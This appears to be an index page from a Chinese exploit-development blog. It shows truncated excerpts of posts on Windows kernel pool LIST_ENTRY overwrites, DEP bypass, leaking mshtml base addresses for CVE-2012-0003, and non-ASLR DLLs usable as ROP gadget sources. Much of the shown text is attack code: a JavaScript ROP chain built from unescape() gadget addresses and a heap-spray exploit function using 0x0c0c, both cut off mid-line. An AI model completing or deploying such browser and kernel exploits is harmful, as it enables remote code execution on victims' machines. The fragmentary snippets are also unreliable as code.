爱杀之爪的矩阵

KERNEL POOL LISTENTRY OVERWRITE ATTACK  LIST_ENTRY OVERWRITE 原理图 测试代码:Sys： VOID Nopagepool_ListEntry_Overwrite(ULONGcbin,ULONG cout,UCHAR * InputBuffer){ PVOIDpatdbuffer=NULL,p

function getddd() { var kkkkk = unescape("\u0433\u77bf"); kkkkk +=unescape("\u5ed5\u77be"); //xchg eax,esp retn kkkkk += unescape("\uf519\u77be")////pop ecx,retn kkkkk += unescape("\u9ef8\u1009

这几天调试发现一个奇怪的现象，一个在数据区段执行的指令，在开启了系统dep时竟然还可以继续执行，换成其他指令就不可以，而且执行时这个内存属性仍旧是不可执行属性。同时按理指令是一条一条执行，但是这个指令的执行是跳跃了，瞬间差点毁了多年的指令执行三观。debugwin7+system dep openBreakpoint 0 hiteax=2e81e

见 链接   http://www.binvul.com/viewthread.php?tid=240&extra=page%3D1

alert("begin")//var div_container = document.getElementById("test");//div_container.style.cssText = "display:none";var cloned = new Array();var selob = document.createElement("select");selob.w0

leak mshtml base address leak shellcode base address其中leak shellcode base 思路是联合 http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003

DpoFeedb.dll        指纹识别 现在买的笔记本都有MSCOMCTL.OCX 需要用户点一次允许 之后就不需要了VBE7INTL.DLL    未找到加载方式迅雷                 mcvcr71.dlljava6                 mcvcr71.dllcomct232.ocx      需要用户点一次允许 之后就不需要了com

采用inking 大牛的方法function exploit(){obj = document.getElementById('oo').object;var src = unescape("%u0c0c%u0c0c");while (src.length < 0x1002) src += src;src = "\\\\xxx" + src;src = src.subs